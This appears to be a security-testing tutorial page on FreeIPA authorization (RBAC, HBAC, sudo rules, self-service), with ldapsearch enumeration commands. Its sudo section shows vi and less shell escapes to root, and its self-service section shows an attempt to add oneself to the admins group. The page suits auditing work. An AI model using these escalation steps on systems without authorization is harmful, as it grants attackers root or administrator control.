Authorization Mechanisms

Explore the authorization components of FreeIPA and techniques to test their security.

Authorization Topics

Navigate through different authorization mechanisms

Role-Based Access Control (RBAC) Overview

Role-Based Access Control (RBAC) is a hierarchical way of organizing access to the data managed by FreeIPA. It consists of roles, privileges, and permissions that define what actions users can perform within the FreeIPA environment.

Overview of the RBAC structure in FreeIPA

RBAC Components

FreeIPA's RBAC system consists of several components that work together to control access to resources.

RBAC Components

Roles

Roles are collections of privileges that can be assigned to users or groups.

Privileges

Privileges are collections of permissions that define what actions can be performed.

Permissions

Permissions define specific operations that can be performed on specific objects.

Enumerating RBAC Components

You can enumerate RBAC components using LDAP queries or built-in FreeIPA tools.

Get all roles

ldapsearch -Y gssapi -b "cn=roles,cn=accounts,dc=example,dc=com"

Get all privileges

ldapsearch -Y gssapi -b "cn=privileges,cn=pbac,dc=example,dc=com"

Get all permissions

ldapsearch -Y gssapi -b "cn=permissions,cn=pbac,dc=example,dc=com"

Host-Based Access Control (HBAC) Rules

Host-Based Access Control (HBAC) rules define who has access to what within the FreeIPA environment. These access controls are similar to firewall rules that determine which users or groups can access which hosts or services.

HBAC Rule Components

HBAC rules consist of several components that work together to control access to hosts and services.

HBAC Rule Components

Users

The users or user groups that the rule applies to.

Hosts

The hosts or host groups that the rule applies to.

Services

The services that the rule applies to (e.g., SSH, FTP).

Enumerating and Testing HBAC Rules

You can enumerate and test HBAC rules using LDAP queries or built-in FreeIPA tools.

Get all HBAC Rules

ldapsearch -Y gssapi -b "cn=hbac,dc=example,dc=com"

HBAC Testing Tip:

When testing HBAC rules, look for overly permissive configurations that might allow unauthorized access. Pay special attention to rules that apply to sensitive hosts or services.

Diagram showing the structure of HBAC rules in FreeIPA

Sudo Rules

Sudo rules in FreeIPA define which users can execute commands with elevated privileges on which hosts. These rules are similar to HBAC rules but provide additional information such as sudoers options and "run as" permissions.

Sudo Rule Components

Sudo rules consist of several components that work together to control command execution with elevated privileges.

Sudo Rule Components

Users

The users or user groups that the rule applies to.

Hosts

The hosts or host groups that the rule applies to.

Commands

The commands that can be executed with elevated privileges.

Run As

The user that the commands will be executed as (e.g., root).

Options

Additional options for the sudo command (e.g., NOPASSWD).

Enumerating and Testing Sudo Rules

You can enumerate and test sudo rules using LDAP queries or built-in FreeIPA tools.

Get all Sudo Rules

ldapsearch -Y gssapi -b "cn=sudorules,cn=sudo,dc=example,dc=com"

Sudo Rule Testing Tip:

When testing sudo rules, look for commands that might be exploited for privilege escalation. For example, commands like vi, less, or more can be used to spawn shells with elevated privileges.

Exploiting Sudo Rules

Misconfigured sudo rules can be exploited to gain elevated privileges on a system.

Exploit a sudo rule that allows running vi as root

sudo vi # Then within vi :set shell=/bin/bash :shell

Exploit a sudo rule that allows running less as root

sudo less /etc/passwd # Then within less !bash

Permission Analysis

Analyzing permissions in FreeIPA can reveal potential security weaknesses or misconfigurations that could be exploited.

Self-Service Capabilities

FreeIPA includes self-service capabilities that allow users to modify their own attributes. These capabilities might be exploited if not properly configured.

Attempt to modify your own attributes

ipa user-mod --manager=admin <your_username>

Attempt to add yourself to privileged groups

ipa group-add-member --users=<your_username> admins

Self-Service Abuse Note:

FreeIPA self-service capabilities might allow users to modify attributes or group memberships that should be restricted. Look for permissions that allow users to modify sensitive attributes or join privileged groups.

Permission Escalation Paths

Analyzing permissions can reveal potential paths for privilege escalation within the FreeIPA environment.

Search for permission entries to identify potential weaknesses

ldapsearch -Y gssapi -b "cn=accounts,dc=example,dc=com" -s sub "(objectClass=ipaPermission)"

Check if a user has a specific permission

ipa user-show <username> --all | grep -i permission

Permission Analysis Tip

When analyzing permissions, look for unexpected or excessive permissions that might allow users to perform actions they shouldn't be able to. Pay special attention to permissions related to user management, group membership, and host management.

Diagram showing the process of analyzing permissions in FreeIPA